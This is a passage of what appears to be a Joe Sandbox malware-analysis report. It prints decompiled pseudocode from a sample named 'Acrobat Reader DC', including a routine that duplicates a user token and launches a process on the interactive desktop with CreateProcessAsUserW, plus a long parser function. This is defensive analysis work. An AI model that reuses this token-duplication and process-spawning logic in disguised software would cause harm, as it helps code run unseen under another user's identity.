                                  • String ID: Shell_TrayWnd
                                  • API String ID: 2889586943-2988720461
                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00446313(intOrPtr _a4, char _a7, intOrPtr _a8, void* _a12, signed int _a16, intOrPtr _a20, signed int _a24, WCHAR* _a28, struct _STARTUPINFOW* _a32, struct _PROCESS_INFORMATION* _a36) {
                                  				char _v9;
                                  				void* _v16;
                                  				char _v20;
                                  				void* _v24;
                                  				void* _v28;
                                  				struct HWINSTA__* _v32;
                                  				intOrPtr _v40;
                                  				WCHAR* _v44;
                                  				intOrPtr _v52;
                                  				char _v56;
                                  				char _v60;
                                  				intOrPtr _v80;
                                  				char _v88;
                                  				void* __edi;
                                  				void* __esi;
                                  				char _t88;
                                  				struct HDESK__* _t90;
                                  				struct HWINSTA__* _t91;
                                  				void* _t95;
                                  				struct HDESK__* _t103;
                                  				void* _t105;
                                  				void* _t106;
                                  				struct _STARTUPINFOW* _t109;
                                  				intOrPtr _t110;
                                  				void* _t118;
                                  				WCHAR* _t127;
                                  				int _t156;
                                  				struct HWINSTA__* _t158;
                                  				void* _t159;
                                  				void* _t160;
                                  				intOrPtr _t175;
                                  
                                  				_t154 = _a4;
                                  				_t158 = 0;
                                  				_v9 = 0;
                                  				_v16 = 0;
                                  				_v24 = 0;
                                  				_v20 = 0;
                                  				_v32 = 0;
                                  				_t127 = 0;
                                  				_v28 = 0;
                                  				E00412F40( &_v88, 0, 0x20);
                                  				_t85 = _a16;
                                  				_t160 = _t159 + 0xc;
                                  				_v88 = 0x20;
                                  				_v80 = _a4;
                                  				_a7 = 0;
                                  				if((_a16 & 0x00000001) != 0) {
                                  					_a7 = 1;
                                  				}
                                  				if(E00436CD7(_t154, _a8, _a12, _t85,  &_v16) == 0) {
                                  					L24:
                                  					_t88 = _v60;
                                  					__eflags = _t88;
                                  					if(_t88 != 0) {
                                  						__imp__UnloadUserProfile(_v16, _t88);
                                  					}
                                  					goto L26;
                                  				} else {
                                  					if((_a16 & 0x00000002) == 0) {
                                  						L6:
                                  						_t158 = OpenWindowStationW(L"winsta0", 0, 0x60000);
                                  						if(_t158 == 0 || _t158 == 0xffffffff) {
                                  							goto L24;
                                  						} else {
                                  							_v32 = GetProcessWindowStation();
                                  							if(SetProcessWindowStation(_t158) == 0) {
                                  								goto L24;
                                  							}
                                  							_t103 = OpenDesktopW(L"default", 0, 0, 0x60081);
                                  							_v24 = _t103;
                                  							if(_t103 == 0) {
                                  								goto L24;
                                  							}
                                  							_t171 = _t103 - 0xffffffff;
                                  							if(_t103 == 0xffffffff) {
                                  								goto L24;
                                  							}
                                  							_t105 = E00436D09(_t158, _t171, _v16,  &_v20);
                                  							_t172 = _t105;
                                  							if(_t105 == 0) {
                                  								goto L24;
                                  							}
                                  							_v56 = 0xb00;
                                  							_v52 = 0xf0000000;
                                  							_v44 = 0x400;
                                  							_v40 = 0xf037f;
                                  							_t106 = E00446124(_t172, _t158, _v20,  &_v56);
                                  							_t173 = _t106;
                                  							if(_t106 == 0) {
                                  								goto L24;
                                  							}
                                  							_v44 = _t127;
                                  							_v40 = 0xf01ff;
                                  							if(E00445F35(_t173, _v24, _v20,  &_v44) == 0) {
                                  								goto L24;
                                  							}
                                  							_t109 = _a32;
                                  							_t109->lpDesktop = L"winsta0\\default";
                                  							_t110 = _a20;
                                  							_t156 =  *(_t109 + 0x2c) & 0x00000100;
                                  							_a12 = _t156;
                                  							_t175 = _t110;
                                  							if(_t175 != 0) {
                                  								_t47 = E004111C1(_t110) + 1; // 0x1
                                  								_push( ~(_t175 > 0) | _t47 * 0x00000002);
                                  								_t127 = E004115D7(_t47, _t158,  ~(_t175 > 0) | _t47 * 0x00000002);
                                  								_t110 = E00412FBA(_t127, _a20, _t47);
                                  								_t156 = _a12;
                                  								_t160 = _t160 + 0x14;
                                  							}
                                  							if(_a7 == 0) {
                                  								L18:
                                  								if((_a16 & 0x00000004) != 0) {
                                  									L20:
                                  									if(CreateProcessAsUserW(_v16, 0, _t127, 0, 0, _t156, _a24 | 0x00000400, _v28, _a28, _a32, _a36) == 0) {
                                  										goto L24;
                                  									}
                                  									if(_a7 != 0) {
                                  										E00436C6E(_a36,  &_v60,  &_v16);
                                  									}
                                  									_v9 = 1;
                                  									L26:
                                  									E00436BA9(_v20);
                                  									if(_t158 != 0) {
                                  										CloseWindowStation(_t158);
                                  									}
                                  									_t90 = _v24;
                                  									if(_t90 != 0) {
                                  										CloseDesktop(_t90);
                                  									}
                                  									_t91 = _v32;
                                  									if(_t91 != 0) {
                                  										SetProcessWindowStation(_t91);
                                  									}
                                  									CloseHandle(_v16);
                                  									_push(_t127);
                                  									E004111DC();
                                  									_t95 = _v28;
                                  									if(_t95 != 0) {
                                  										__imp__DestroyEnvironmentBlock(_t95);
                                  									}
                                  									return _v9;
                                  								}
                                  								_t118 = _v16;
                                  								__imp__CreateEnvironmentBlock( &_v28, _t118, 0);
                                  								if(_t118 == 0) {
                                  									goto L24;
                                  								}
                                  								goto L20;
                                  							} else {
                                  								__imp__LoadUserProfileW(_v16,  &_v88);
                                  								if(_t110 == 0) {
                                  									goto L24;
                                  								}
                                  								goto L18;
                                  							}
                                  						}
                                  					}
                                  					if(DuplicateTokenEx(_v16, 0, 0, 2, 1,  &_a12) == 0) {
                                  						goto L24;
                                  					}
                                  					CloseHandle(_v16);
                                  					_v16 = _a12;
                                  					goto L6;
                                  				}
                                  			}

                                  APIs
                                  • _memset.LIBCMT ref: 0044633D
                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                  • OpenWindowStationW.USER32 ref: 004463B8
                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                  • _wcslen.LIBCMT ref: 00446498
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _wcsncpy.LIBCMT ref: 004464C0
                                  • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                  • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                  • CloseDesktop.USER32(?), ref: 0044657A
                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                  • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                  • String ID: $@OH$default$winsta0
                                  • API String ID: 2173856841-3791954436
                                  • Opcode ID: 5824ace93f6d80d94595fe83079761c9375f447ecbc8cf85fbb585e8fea6ba76
                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                  • Opcode Fuzzy Hash: 5824ace93f6d80d94595fe83079761c9375f447ecbc8cf85fbb585e8fea6ba76
                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 55%
                                  			E004096A0(signed int* __eax, void* __eflags, void* __fp0, void* _a4, intOrPtr _a8, void* _a12, char* _a16) {
                                  				intOrPtr _v8;
                                  				short _v10;
                                  				short _v12;
                                  				void* _v20;
                                  				void* _v24;
                                  				intOrPtr _v28;
                                  				void _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				char _v52;
                                  				void* _v56;
                                  				signed int _v60;
                                  				intOrPtr _v64;
                                  				void _v68;
                                  				char _v76;
                                  				void* _v80;
                                  				char _v84;
                                  				void* _v88;
                                  				void _v92;
                                  				char _v100;
                                  				void _v104;
                                  				signed int _v108;
                                  				void* _v112;
                                  				void* _v116;
                                  				signed int _v120;
                                  				signed int _v124;
                                  				signed int _v128;
                                  				char _v132;
                                  				void _v136;
                                  				void _v140;
                                  				signed int _v144;
                                  				void* _v148;
                                  				signed int _v152;
                                  				void* _v156;
                                  				signed int _v160;
                                  				char _v161;
                                  				intOrPtr _v164;
                                  				signed int _v168;
                                  				signed int _v172;
                                  				long _v176;
                                  				WCHAR* _v180;
                                  				signed int _v184;
                                  				void _v188;
                                  				void _v192;
                                  				void* _v196;
                                  				void* _v200;
                                  				signed int _v204;
                                  				signed int _v208;
                                  				signed int _v212;
                                  				signed int _v224;
                                  				intOrPtr _v228;
                                  				void** __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				long _t937;
                                  				void* _t938;
                                  				signed int _t939;
                                  				signed int* _t943;
                                  				signed int _t946;
                                  				signed int _t949;
                                  				void* _t956;
                                  				void* _t958;
                                  				void* _t967;
                                  				signed int _t968;
                                  				signed int _t969;
                                  				signed int _t974;
                                  				signed int _t978;
                                  				void* _t979;
                                  				void* _t983;
                                  				intOrPtr _t984;
                                  				intOrPtr _t985;
                                  				intOrPtr _t997;
                                  				intOrPtr _t1000;
                                  				void* _t1002;
                                  				intOrPtr _t1003;
                                  				void* _t1009;
                                  				intOrPtr _t1011;
                                  				void* _t1012;
                                  				intOrPtr _t1013;
                                  				void* _t1015;
                                  				intOrPtr _t1016;
                                  				void* _t1109;
                                  				intOrPtr _t1111;
                                  				void* _t1112;
                                  				signed int _t1113;
                                  				signed int _t1114;
                                  				void _t1116;
                                  				void* _t1123;
                                  				void* _t1126;
                                  				signed int _t1128;
                                  				void* _t1129;
                                  				signed int _t1130;
                                  				void* _t1131;
                                  				void* _t1139;
                                  				void* _t1153;
                                  				intOrPtr _t1158;
                                  				void* _t1159;
                                  				void* _t1160;
                                  				signed int _t1162;
                                  				void* _t1163;
                                  				signed int _t1164;
                                  				signed int _t1165;
                                  				void* _t1166;
                                  				void* _t1173;
                                  				void* _t1176;
                                  				signed int _t1177;
                                  				signed int _t1193;
                                  				signed int _t1194;
                                  				short _t1195;
                                  				void* _t1197;
                                  				signed int _t1200;
                                  				void* _t1202;
                                  				signed int _t1204;
                                  				void* _t1207;
                                  				void* _t1215;
                                  				void* _t1219;
                                  				signed int _t1220;
                                  				void* _t1222;
                                  				void** _t1223;
                                  				void* _t1227;
                                  				intOrPtr* _t1228;
                                  				signed int _t1229;
                                  				void* _t1231;
                                  				void* _t1232;
                                  				signed int _t1235;
                                  				signed int _t1236;
                                  				void* _t1237;
                                  				void* _t1239;
                                  				void* _t1240;
                                  				intOrPtr* _t1241;
                                  				signed int _t1242;
                                  				void* _t1243;
                                  				void* _t1245;
                                  				void* _t1246;
                                  				signed int _t1248;
                                  				signed int _t1249;
                                  				signed int _t1250;
                                  				signed int* _t1252;
                                  				void* _t1254;
                                  				void* _t1256;
                                  				void* _t1259;
                                  				short* _t1265;
                                  				void* _t1266;
                                  				void _t1269;
                                  				void* _t1270;
                                  				void* _t1272;
                                  				void* _t1276;
                                  				void* _t1278;
                                  				void* _t1281;
                                  				void* _t1283;
                                  				void* _t1284;
                                  				void* _t1286;
                                  				void* _t1288;
                                  				signed int _t1290;
                                  				signed int _t1291;
                                  				signed int _t1295;
                                  				signed int _t1296;
                                  				void* _t1297;
                                  				void* _t1298;
                                  				intOrPtr* _t1308;
                                  				signed int _t1310;
                                  				signed int _t1311;
                                  				void* _t1317;
                                  				intOrPtr* _t1319;
                                  				void* _t1322;
                                  				void* _t1325;
                                  				intOrPtr _t1330;
                                  				signed int _t1332;
                                  				intOrPtr _t1335;
                                  				signed int _t1337;
                                  				void* _t1341;
                                  				void* _t1347;
                                  				void _t1349;
                                  				void* _t1350;
                                  				signed int _t1351;
                                  				signed int _t1352;
                                  				long _t1354;
                                  				void* _t1358;
                                  				void* _t1359;
                                  				void* _t1361;
                                  				signed int _t1362;
                                  				void _t1364;
                                  				signed int _t1365;
                                  				void* _t1369;
                                  				void* _t1376;
                                  				void* _t1379;
                                  				intOrPtr* _t1382;
                                  				void _t1385;
                                  				intOrPtr _t1391;
                                  				void* _t1393;
                                  				intOrPtr _t1394;
                                  				void* _t1396;
                                  				void* _t1397;
                                  				void* _t1402;
                                  				void* _t1403;
                                  				void** _t1406;
                                  				signed int _t1407;
                                  				void _t1411;
                                  				signed int _t1412;
                                  				long _t1413;
                                  				void* _t1414;
                                  				short _t1442;
                                  				void* _t1443;
                                  				void* _t1444;
                                  				signed int _t1448;
                                  				intOrPtr _t1450;
                                  				intOrPtr _t1454;
                                  				intOrPtr _t1455;
                                  				void* _t1474;
                                  				void* _t1477;
                                  				void* _t1478;
                                  				void* _t1485;
                                  				void* _t1487;
                                  				void** _t1488;
                                  				signed int _t1493;
                                  				signed int _t1507;
                                  				void _t1508;
                                  				void* _t1510;
                                  				void* _t1511;
                                  				void _t1513;
                                  				void _t1519;
                                  				void* _t1534;
                                  				void* _t1537;
                                  				void _t1545;
                                  				signed int _t1549;
                                  				intOrPtr _t1559;
                                  				intOrPtr _t1561;
                                  				intOrPtr _t1562;
                                  				signed int _t1570;
                                  				void* _t1593;
                                  				WCHAR* _t1595;
                                  				void _t1609;
                                  				signed int _t1611;
                                  				intOrPtr _t1617;
                                  				intOrPtr _t1618;
                                  				void* _t1652;
                                  				signed int _t1660;
                                  				signed int _t1664;
                                  				intOrPtr _t1665;
                                  				intOrPtr _t1668;
                                  				void* _t1669;
                                  				void* _t1672;
                                  				void* _t1684;
                                  				void* _t1693;
                                  				intOrPtr _t1697;
                                  				intOrPtr _t1710;
                                  				intOrPtr _t1717;
                                  				intOrPtr _t1725;
                                  				void* _t1730;
                                  				intOrPtr* _t1731;
                                  				intOrPtr* _t1732;
                                  				intOrPtr* _t1733;
                                  				intOrPtr* _t1734;
                                  				signed int _t1735;
                                  				void _t1738;
                                  				void* _t1740;
                                  				void _t1741;
                                  				signed int _t1746;
                                  				signed int* _t1748;
                                  				void* _t1750;
                                  				signed int _t1753;
                                  				signed int _t1754;
                                  				long _t1755;
                                  				signed int _t1761;
                                  				intOrPtr _t1762;
                                  				void* _t1763;
                                  				void* _t1767;
                                  				signed int _t1768;
                                  				intOrPtr* _t1769;
                                  				void* _t1770;
                                  				void* _t1777;
                                  				signed int _t1778;
                                  				signed int _t1782;
                                  				signed int _t1785;
                                  				void* _t1787;
                                  				void* _t1788;
                                  				signed int _t1790;
                                  				signed int _t1791;
                                  				intOrPtr _t1796;
                                  				signed int _t1799;
                                  				signed int _t1803;
                                  				void* _t1806;
                                  				void* _t1809;
                                  				void* _t1826;
                                  				signed int _t1836;
                                  				void* _t1851;
                                  
                                  				_t1851 = __fp0;
                                  				_t1391 = _a8;
                                  				_t1728 = __eax;
                                  				_t1757 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) +  *__eax * 4))))));
                                  				_t937 = E004111C1( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) +  *__eax * 4)))))));
                                  				_t1806 = (_t1803 & 0xfffffff8) - 0xd4 + 4;
                                  				_v176 = _t937;
                                  				_t938 = _t937 + 1;
                                  				if(_t938 == 0) {
                                  					_t939 = 8;
                                  				} else {
                                  					_t939 = (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3);
                                  					_t1836 = _t939;
                                  				}
                                  				_v172 = _t939;
                                  				_push( ~(0 | _t1836 > 0x00000000) | _t939 * 0x00000002);
                                  				_v180 = E004115D7(_t1728, _t1757, _t1836);
                                  				E00410E60(_t941, _t1757, _v176 + _v176 + 2);
                                  				_push(4);
                                  				_t943 = E004115D7(_t1728, _t1757, _t1836);
                                  				_t1809 = _t1806 + 0x14;
                                  				if(_t943 == 0) {
                                  					_t943 = 0;
                                  				} else {
                                  					 *_t943 = 1;
                                  				}
                                  				_v168 = _t943;
                                  				if( *((intOrPtr*)(_a4 + 0x140)) == 0) {
                                  					L288:
                                  					E00402250( &_v180);
                                  					goto L289;
                                  				} else {
                                  					if( *_t943 > 1) {
                                  						 *_v168 =  *_v168 - 1;
                                  						E004013A0( &_v180);
                                  						_t949 = E00446618(_v176 + 1);
                                  						_v176 = _t949;
                                  						_push( ~(0 | __eflags > 0x00000000) | _t949 * 0x00000002);
                                  						_t1761 = E004115D7(_t1728, _t949, __eflags);
                                  						E00410E60(_t1761, _v184, _v180 +  &(_v180[1]));
                                  						_t1809 = _t1809 + 0x10;
                                  						_v184 = _t1761;
                                  					}
                                  					CharUpperBuffW(_v180, _v176);
                                  					_t956 = _a4;
                                  					_t1762 =  *((intOrPtr*)(_t956 + 0x13c));
                                  					if(_t1762 != 0) {
                                  						_t958 =  *((intOrPtr*)(_t956 + 0x140)) - 1;
                                  						__eflags = _t958;
                                  						if(_t958 < 0) {
                                  							goto L288;
                                  						}
                                  						_v136 = 0;
                                  						_v116 = _t958;
                                  						do {
                                  							asm("cdq");
                                  							_v200 = _v116 + _v136 - _v136 >> 1;
                                  							__eflags = E0040BCC0( &_v180,  *((intOrPtr*)(_t1762 + (_v116 + _v136 - _v136 >> 1) * 4)));
                                  							if(__eflags >= 0) {
                                  								if(__eflags <= 0) {
                                  									__eflags = _v136 - _v116;
                                  									if(_v136 > _v116) {
                                  										goto L288;
                                  									}
                                  									_t1763 =  *(_t1762 + _v200 * 4);
                                  									E00402250( &_v180);
                                  									L17:
                                  									_t967 = _t1763;
                                  									if(_t967 == 0) {
                                  										L289:
                                  										_t946 = E0047DCBB(__eflags, _t1851, _a4, _t1391, _t1728, _a12);
                                  										L264:
                                  										return _t946;
                                  									}
                                  									_v136 =  *((intOrPtr*)(_t967 + 0x14));
                                  									_t968 =  *_t1728;
                                  									_v160 =  *((intOrPtr*)(_t967 + 0x18));
                                  									_v24 =  *((intOrPtr*)(_t967 + 0x10));
                                  									_t1609 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t968 * 4)) + 0xa));
                                  									_t969 = _t968 + 1;
                                  									 *_t1728 = _t969;
                                  									_v8 =  *((intOrPtr*)(_a4 + 0x148));
                                  									_v196 = 0;
                                  									_v188 = 1;
                                  									_v184 = 0;
                                  									_v180 = 0x488088;
                                  									_v176 = 0;
                                  									_v172 = 0;
                                  									_v168 = 0;
                                  									_v132 = 0x48b874;
                                  									_v128 = 0;
                                  									_v124 = 0;
                                  									_v120 = 0;
                                  									if( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t969 * 4)) + 8)) != 0x47) {
                                  										_push(_t1609);
                                  										_push(0x6f);
                                  										_push(_a4);
                                  										L624:
                                  										E0045E737(_t1851);
                                  										goto L625;
                                  									} else {
                                  										_t974 = _t969 + 1;
                                  										_v104 = _t1609;
                                  										_t1611 = _t974;
                                  										_v204 = 0;
                                  										_t1767 = 0;
                                  										_v144 = _t1611;
                                  										while(1) {
                                  											 *_t1728 = _t974;
                                  											_t1442 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4)) + 8));
                                  											if(_t1442 < 0x47) {
                                  											}
                                  											L21:
                                  											_t974 = _t974 + 1;
                                  											while(1) {
                                  												 *_t1728 = _t974;
                                  												_t1442 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4)) + 8));
                                  												if(_t1442 < 0x47) {
                                  												}
                                  												goto L22;
                                  											}
                                  											goto L21;
                                  											L22:
                                  											_t1443 = _t1442 - 0x47;
                                  											__eflags = _t1443;
                                  											if(_t1443 == 0) {
                                  												_t1767 = _t1767 + 1;
                                  												goto L21;
                                  											}
                                  											_t1444 = _t1443 - 1;
                                  											__eflags = _t1444;
                                  											if(_t1444 != 0) {
                                  												__eflags = _t1444 != 0x37;
                                  												if(_t1444 != 0x37) {
                                  													goto L21;
                                  												}
                                  												_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4 - 4)) + 0xa)));
                                  												_push(0x6f);
                                  												_push(_a4);
                                  												goto L624;
                                  											}
                                  											__eflags = _t1767;
                                  											if(_t1767 != 0) {
                                  												_t1767 = _t1767 - 1;
                                  												_t974 = _t974 + 1;
                                  												continue;
                                  											}
                                  											_v208 = _t974;
                                  											 *_t1728 = _t974 + 1;
                                  											_t978 = _v24;
                                  											__eflags = _t978 -  *0x4a90f8; // 0x0
                                  											if(__eflags > 0) {
                                  												L296:
                                  												_v148 = _t1444;
                                  												L28:
                                  												_v116 = _t1444;
                                  												__eflags = _v136 - _t1444;
                                  												if(_v136 <= _t1444) {
                                  													L57:
                                  													_t979 = _v116;
                                  													__eflags = _t979 - _v160;
                                  													if(_t979 < _v160) {
                                  														L622:
                                  														_push(_v104);
                                  														_push(0x70);
                                  														goto L623;
                                  													}
                                  													__eflags = _t979 - _v136;
                                  													if(_t979 > _v136) {
                                  														goto L622;
                                  													}
                                  													__eflags = _t1611 - _v208;
                                  													if(_t1611 != _v208) {
                                  														goto L622;
                                  													}
                                  													_t1393 = _v24;
                                  													_t1768 = 0;
                                  													_v212 = 3;
                                  													_v200 = 0;
                                  													_v156 = 0;
                                  													_v152 = _t1393;
                                  													__eflags = _t1393;
                                  													if(_t1393 < 0) {
                                  														_v152 = 0;
                                  													}
                                  													__eflags =  *0x4a7f3d; // 0x0
                                  													if(__eflags != 0) {
                                  														_t1611 =  *0x4a7f38; // 0x0
                                  														 *_t1611 = 0;
                                  														_t1448 =  *0x4a7f38; // 0x0
                                  														 *((intOrPtr*)(_t1448 + 4)) = _v152;
                                  														 *0x4a7f3d = 0;
                                  													} else {
                                  														_push(0xc);
                                  														_t1295 = E004115D7(_t1728, _t1768, __eflags);
                                  														_t1809 = _t1809 + 4;
                                  														__eflags = _t1295 - _t1768;
                                  														if(_t1295 == _t1768) {
                                  															_t1754 = 0;
                                  														} else {
                                  															_t1754 = _t1295;
                                  															 *_t1754 = _t1768;
                                  															_t1611 = _v152;
                                  															 *(_t1754 + 4) = _t1611;
                                  															__eflags = _v152 - _t1768;
                                  															if(_v152 < _t1768) {
                                  																 *(_t1754 + 4) = _t1768;
                                  															}
                                  															_t1296 = _v156;
                                  															__eflags = _t1296 - _t1768;
                                  															if(__eflags != 0) {
                                  																_push(0x20);
                                  																_v204 = _t1296;
                                  																_t1297 = E004115D7(_t1754, _t1768, __eflags);
                                  																_t1809 = _t1809 + 4;
                                  																__eflags = _t1297 - _t1768;
                                  																if(_t1297 == _t1768) {
                                  																	_t1298 = 0;
                                  																	__eflags = 0;
                                  																} else {
                                  																	_t1298 = E0044A801(_t1297);
                                  																}
                                  																 *_t1754 = _t1298;
                                  																E0040E0A0(_t1298, _v204);
                                  																_t1790 = _v208;
                                  																 *((intOrPtr*)( *_t1754 + 0x10)) =  *((intOrPtr*)(_t1790 + 0x10));
                                  																 *((intOrPtr*)( *_t1754 + 0x14)) =  *((intOrPtr*)(_t1790 + 0x14));
                                  																 *((intOrPtr*)( *_t1754 + 0x18)) = 0;
                                  																 *((intOrPtr*)( *_t1754 + 0x1c)) = 0;
                                  																E00453443(_t1754,  *_t1754 + 0x18,  *((intOrPtr*)(_t1790 + 0x18)));
                                  																_t1611 =  *(_t1790 + 0x1c);
                                  																E00453443(_t1754,  *_t1754 + 0x1c, _t1611);
                                  																_t1768 = 0;
                                  															} else {
                                  																 *_t1754 = _t1768;
                                  															}
                                  														}
                                  														_t1549 =  *0x4a7f38; // 0x0
                                  														 *(_t1754 + 8) = _t1549;
                                  														 *0x4a7f38 = _t1754;
                                  													}
                                  													_t983 = _v156;
                                  													 *0x4a7f34 =  *0x4a7f34 + 1;
                                  													__eflags = _t983 - _t1768;
                                  													if(_t983 != _t1768) {
                                  														_t1730 = _t983;
                                  														_t984 =  *((intOrPtr*)(_t983 + 0x18));
                                  														__eflags = _t984 - _t1768;
                                  														if(_t984 != _t1768) {
                                  															E0040B400(_t1393,  &_v156, _t1730, _t984);
                                  														}
                                  														_t985 =  *((intOrPtr*)(_t1730 + 0x1c));
                                  														__eflags = _t985 - _t1768;
                                  														if(_t985 != _t1768) {
                                  															E0040B400(_t1393,  &_v156, _t1730, _t985);
                                  														}
                                  														__eflags =  *((char*)(_t1730 + 0x10));
                                  														if( *((char*)(_t1730 + 0x10)) == 0) {
                                  															_t1546 =  *((intOrPtr*)(_t1730 + 0x14));
                                  															__eflags =  *((intOrPtr*)(_t1730 + 0x14)) - _t1768;
                                  															if( *((intOrPtr*)(_t1730 + 0x14)) != _t1768) {
                                  																E0040E1C0(_t1546, _t1730, 1);
                                  															}
                                  														}
                                  														E004431AD(_t1730);
                                  													}
                                  													__eflags = _v136 - 1;
                                  													if(_v136 < 1) {
                                  														L146:
                                  														_t1769 = _a4;
                                  														_v100 = 0;
                                  														_v88 = 0;
                                  														_v84 = 0;
                                  														_v80 = 0;
                                  														_v76 = 0;
                                  														_v68 = 0;
                                  														_v56 = 0;
                                  														_v52 = 0;
                                  														 *((intOrPtr*)(_t1769 + 0x148)) = _v116;
                                  														_v92 = 1;
                                  														_v60 = 1;
                                  														_t1450 =  *((intOrPtr*)( *_t1769 + 4));
                                  														__eflags =  *((char*)(_t1450 + _t1769 + 0xd));
                                  														_t1731 = _t1450 + _t1769 + 4;
                                  														if(__eflags != 0) {
                                  															E0047390F(_t1450,  *(_t1731 + 4),  &_v100);
                                  															 *((char*)(_t1731 + 9)) = 0;
                                  														} else {
                                  															_push(0x40);
                                  															_t1176 = E004115D7(_t1731, _t1769, __eflags);
                                  															_t1809 = _t1809 + 4;
                                  															__eflags = _t1176;
                                  															if(_t1176 == 0) {
                                  																_t1176 = 0;
                                  															} else {
                                  																__eflags = 0;
                                  																 *(_t1176 + 8) = 1;
                                  																 *((intOrPtr*)(_t1176 + 0xc)) = 0;
                                  																 *_t1176 = 0;
                                  																 *((char*)(_t1176 + 0x10)) = 0;
                                  																 *((intOrPtr*)(_t1176 + 0x14)) = 0;
                                  																 *((char*)(_t1176 + 0x18)) = 0;
                                  																 *(_t1176 + 0x28) = 1;
                                  																 *((intOrPtr*)(_t1176 + 0x2c)) = 0;
                                  																 *((intOrPtr*)(_t1176 + 0x20)) = 0;
                                  																 *((char*)(_t1176 + 0x30)) = 0;
                                  															}
                                  															 *(_t1176 + 0x38) =  *(_t1731 + 4);
                                  															 *(_t1731 + 4) = _t1176;
                                  														}
                                  														 *_t1731 =  *_t1731 + 1;
                                  														_t1394 =  *((intOrPtr*)(_t1769 + 0x16c));
                                  														_t1732 = _t1769 + 0x16c;
                                  														_t1451 = _t1769;
                                  														_v156 =  *((intOrPtr*)(_t1769 + 0xf4));
                                  														E004091E0(_t1769,  *((intOrPtr*)(_t1769 + 0xf4)), _t1851, _t1393 + 1);
                                  														__eflags = _t1394 -  *_t1732;
                                  														if(_t1394 <  *_t1732) {
                                  															do {
                                  																E0040C790(_t1394, _t1451, _t1732);
                                  																__eflags = _t1394 -  *_t1732;
                                  															} while (_t1394 <  *_t1732);
                                  															goto L151;
                                  														} else {
                                  															L151:
                                  															_t1733 = _t1769;
                                  															 *((intOrPtr*)(_t1733 + 0xf4)) = _v156;
                                  															_t1617 =  *((intOrPtr*)( *_t1733 + 4));
                                  															__eflags =  *((char*)(_t1617 + _t1733 + 0xd));
                                  															_t334 = _t1733 + 4; // 0x4
                                  															_t997 =  *((intOrPtr*)(_t1617 + _t334 + 4));
                                  															if( *((char*)(_t1617 + _t1733 + 0xd)) != 0) {
                                  																_t997 =  *((intOrPtr*)(_t997 + 0x38));
                                  															}
                                  															__eflags =  *((char*)(_t997 + 0x10));
                                  															if( *((char*)(_t997 + 0x10)) == 0) {
                                  																_t1770 = _a12;
                                  																 *_a16 = 0;
                                  																E00408F40(_t1733, _t1770);
                                  																 *(_t1770 + 8) = 1;
                                  																 *_t1770 = 0;
                                  																goto L166;
                                  															} else {
                                  																 *_a16 = 1;
